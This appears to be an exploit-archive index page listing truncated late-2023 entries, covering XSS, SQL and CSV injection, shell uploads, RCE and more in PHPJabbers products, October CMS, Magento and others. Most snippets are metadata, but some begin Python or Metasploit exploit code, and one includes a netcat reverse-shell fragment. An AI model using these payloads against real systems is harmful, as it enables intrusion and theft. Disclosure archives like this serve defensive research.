October CMS 3.4.0 About Cross Site Scripting

OctoberCMS v3.4.0 About Stored Cross-Site Scripting Vulnerability Vendor: October CMS Product web page: https://www.octobercms.com Affected version: 3.4.0 Summary: OctoberCMS is a self-hosted content management system CMS based on the PHP programming language and Laravel web application framework...

PHPJabbers Shuttle Booking Software 2.0 CSV Injection

Exploit Title: PHPJabbers Shuttle Booking Software v2.0 - CSV Injection Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/shuttle-booking-software/ Version: v2.0 Tested on: Windows 10...

PHPJabbers Appointment Scheduler 3.0 CSV Injection

Exploit Title: PHPJabbers Appointment Scheduler v3.0 - CSV Injection Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/appointment-scheduler/ Version: v3.0 Tested on: Windows 10,...

GaatiTrack Courier Management System 1.0 SQL Injection

Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php...

October CMS 3.4.0 Wiki Article Cross Site Scripting

OctoberCMS v3.4.0 Wikiarticle Stored Cross-Site Scripting Vulnerability Vendor: October CMS Product web page: https://www.octobercms.com Affected version: 3.4.0 Summary: OctoberCMS is a self-hosted content management system CMS based on the PHP programming language and Laravel web application...

October CMS 3.4.0 Author Cross Site Scripting

OctoberCMS v3.4.0 Author Stored Cross-Site Scripting Vulnerability Vendor: October CMS Product web page: https://www.octobercms.com Affected version: 3.4.0 Summary: OctoberCMS is a self-hosted content management system CMS based on the PHP programming language and Laravel web application framewor...

PHPJabbers Time Slots Booking Calendar 4.0 HTML Injection

Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/ Version: v4.0 Tested on:...

PHPJabbers Availability Booking Calendar 5.0 Missing Rate Limiting

Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - No Rate Limit in Email Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo...

PHPJabbers Availability Booking Calendar 5.0 HTML Injection

Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0...

PHPJabbers Time Slots Booking Calendar 4.0 Cross Site Scripting

Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - Multiple Stored XSS Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/ Version: v4.0 Tested on...

PHPJabbers Car Rental 3.0 Cross Site Scripting

Exploit Title: PHPJabbers Car Rental v3.0 - Multiple Stored XSS Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/car-rental-script/ Version: v3.0 Tested on: Windows 10, Windows 11,...

WordPress Phlox-Pro Theme 5.14.0 Cross Site Scripting

Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting XSS Date: 3/12/2023 Exploit Author: Haktrak Team Vendor Homepage: https://phlox.pro Software Link: https://www.phlox.pro/go/ Version: 5.14.0 Tested on: Linuxapache/wordrepss 6.3.1 Description: A Cross Site Scripti...

ARM Mali r44p0 Use-After-Free

Arm Mali r44p0: UAF by freeing waitqueue with elements on it In Mali r44p0, it became possible to free the kbasecontext of a kbasefile while still having a file pointing to the kbasefile. This is supposed to be safe because of the kfile-fopscount and kfile-mapcount checks. However, kbasepoll will...

PHPJabbers Appointment Scheduler 3.0 Missing Rate Limiting

Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/appointment-scheduler/ Version: v3.0 Tested on: Windows...

PHPJabbers Appointment Scheduler 3.0 HTML Injection

Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple HTML Injection Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/appointment-scheduler/ Version: v3.0 Tested on: Window...

PHPJabbers Car Rental 3.0 Missing Rate Limit

Exploit Title: PHPJabbers Car Rental v3.0 - No Rate Limit in Email Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/car-rental-script/ Version: v3.0 Tested on: Windows 10, Windows 11...

PHPJabbers Appointment Scheduler 3.0 Cross Site Scripting

Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple Stored XSS Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/appointment-scheduler/ Version: v3.0 Tested on: Windows 10...

PHPJabbers Car Rental 3.0 CSV Injection

Exploit Title: PHPJabbers Car Rental v3.0 - CSV Injection Date: 19/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/car-rental-script/ Version: v3.0 Tested on: Windows 10, Windows 11, MS Offi...

Kopage Website Builder 4.4.15 Cross Site Scripting

Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting XSS Date: 1/12/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.kopage.com/ Version: Version : 4.4.15 Tested on: https://demo.kopage.com/index.php Poc: 1 Install the system through the website and log in...

WBCE CMS 1.6.1 Shell Upload

Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution Date: 30/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.1.zip Version: 1.6.1 Tested on: https://www.softaculous.com/apps/cms/WBCECMS POC: 1...

CE Phoenix 1.0.8.20 Remote Code Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...

Online Student Clearance System 1.0 Shell Upload

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

WordPress Royal Elementor Addons And Templates Remote Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Royal Elementor Addons RCE', 'Description' = %q Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor...

Fortra Digital Guardian Agent Uninstaller Cross Site Scripting / UninstallKey Cached

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Uninstall Key Caching product: Fortra Digital Guardian Agent Uninstaller Data Loss Prevention vulnerable version: Agent: 7.9.4 fixed version: Agent: 7.9.4 CVE number:...

etcd-browser 87ae63d75260 Directory Traversal

An issue was discovered in server.js in etcd-browser 87ae63d75260. By supplying a /../../../ Directory Traversal input to the URL's GET request while connecting to the remote server port specified during setup, an attacker can retrieve local operating system files from the remote system...

SmartNode SN200 3.21.2-23021 OS Command Injection

Advisory ID: SYSS-2023-019 Product: SmartNode SN200 Analog Telephone Adapter ATA & VoIP Gateway Manufacturer: Patton LLC Affected Versions: = 3.21.2-23021 Tested Versions: 2.21.1-22041, 3.21.2-23021, 3.22.0-23083 Vulnerability Type: OS Command Injection CWE-78 Vulnerability Type: Improper Access...

Loytec LINX Configurator 7.4.10 Insecure Transit / Cleartext Secrets

CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 + Title : Multiple vulnerabilities in Loytec LINX Configurator + Vendor : LOYTEC electronics GmbH + Affected Products : LINX Configurator 7.4.10 + Affected Components : LINX Configurator + Discovery Date : 01-Sep-2021 + Publication date :...

Loytec L-INX Automation Servers Information Disclosure / Cleartext Secrets

CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 + Title : Multiple vulnerabilities in Loytec L-INX Automation Servers + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4 + Affected Components : L-INX Automation Servers +...

m-privacy TightGate-Pro Code Execution / Insecure Permissions

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: m-privacy TightGate-Pro vulnerable version: Rolling Release, servers with the following package versions are vulnerable: tightgatevnc...

osCommerce 4 Cross Site Scripting

Exploit Title: osCommerce 4 - Reflected XSS Exploit Author: CraCkEr Date: 13/11/2023 Vendor: osCommerce ltd. Vendor Homepage: https://www.oscommerce.com/ Software Link: https://demo.oscommerce.com/ Demo Link: https://demo.oscommerce.com/printshop/ Tested on: Windows 11 Home Impact: Manipulate the...

CE Phoenix 1.0.8.20 Remote Command Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix POC: 1. Login to admin panel: - Visit:...

PopojiCMS 2.0.1 Remote Command Execution

Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution Date: 27/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.popojicms.org/ Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip Version: Version : 2.0.1 Tested on:...

CSZ CMS 1.3.0 Remote Command Execution

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 17/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution Vendor: AAF Digital HD Forum | Atelmo GmbH Product web page: http://www.aaf-digital.info | https://www.atemio.de Affected version: Firmware =2.01 Summary: The Atemio AM 520 HD Full HD...

CSZ CMS 1.3.0 Shell Upload

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 23/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

CE Phoenix 1.0.8.20 Cross Site Scripting

Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://phoenixcart.org/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/ecommerce/CEPhoenix POC: 1-Login admin panel , go to this url :...

PyroCMS 3.0.1 Cross Site Scripting

Exploit Title: PyroCMS v3.0.1 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://pyrocms.com/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/cms/PyroCMS...

WordPress UserPro 5.1.x Password Reset / Authentication Bypass / Escalation

Vulnerability Details & Technical Analysis Password Reset to Privilege Escalation using the Sensitive Information Disclosure via Shortcode Description: UserPro = 5.1.1 – Insecure Password Reset Mechanism Affected Plugin: UserPro Plugin Slug: userpro Affected Versions: = 5.1.1 CVE ID: CVE-2023-244...

Jorani Leave Management System 1.0.2 Host Header Injection

Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://jorani.org/ Software Link: https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip Version: v1.0.2 Tested...

Magento 2.4.6 XSLT Server Side Injection

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: Magento 2.4.6-p3 Version: 2.4.6 Tested on: 2.4.6 POC 1. Enter with admin credentials to this URL:...

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

Exploit Title: Multiple Cross Site Scripting in PHPJabbers Availability Booking Calendar v5.0 Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Orpon Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version:...

Shuttle Booking Software 2.0 Cross Site Scripting

Exploit Title: Shuttle Booking Software v2.0 - Multiple Stored Cross-Site Scripting Authenticated Date: 09/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/shuttle-booking-software/ Software Link:...

FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection

Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection Command Execution Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://commercemarketplace.adobe.com/ Software Link:...

PHPJabbers Availability Booking Calendar 5.0 CSV Injection

Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSV Injection Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0...

GaatiTrack Courier Management System 1.0 Cross Site Scripting

Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting Date: 12/112023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link:...

Magento 2.4.6 XSLT Server Side Injection / Command Execution

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip Version: 2.4.6 Tested on: 2.4.6 POC: 1 Enter with adm...

EzViz Studio 2.2.0 DLL Hijacking

PoC: DLL Hijacking via EzViz Studio Reported by EAFZ from Pythongoras Author: EAFZ aka myantti3m CVE: CVE-2023-41613. Test Environment: OS: Windows 11 Pro 64 bit10.0, Build 2261 EzViz Studio version: 2.2.0 Technical Description 1. Technical Description EzvizStudio.exe searches for a DLL called...

ZoneMinder Snapshots Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ZoneMinder Snapshots Command Injection', 'Description' = %q This module exploits an unauthenticated command injection in zoneminder that can be...

EnBw SENEC Legacy Storage Box Log Disclosure

Advisory ID: Ph0s-2023-001 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-284: Improper Access Control Risk Level: CVSS v3.1 Vector:...

Apache ActiveMQ Unauthenticated Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache ActiveMQ Unauthenticated Remote Code Execution', 'Description' = %q This module exploits a deserialization vulnerability in the OpenWire...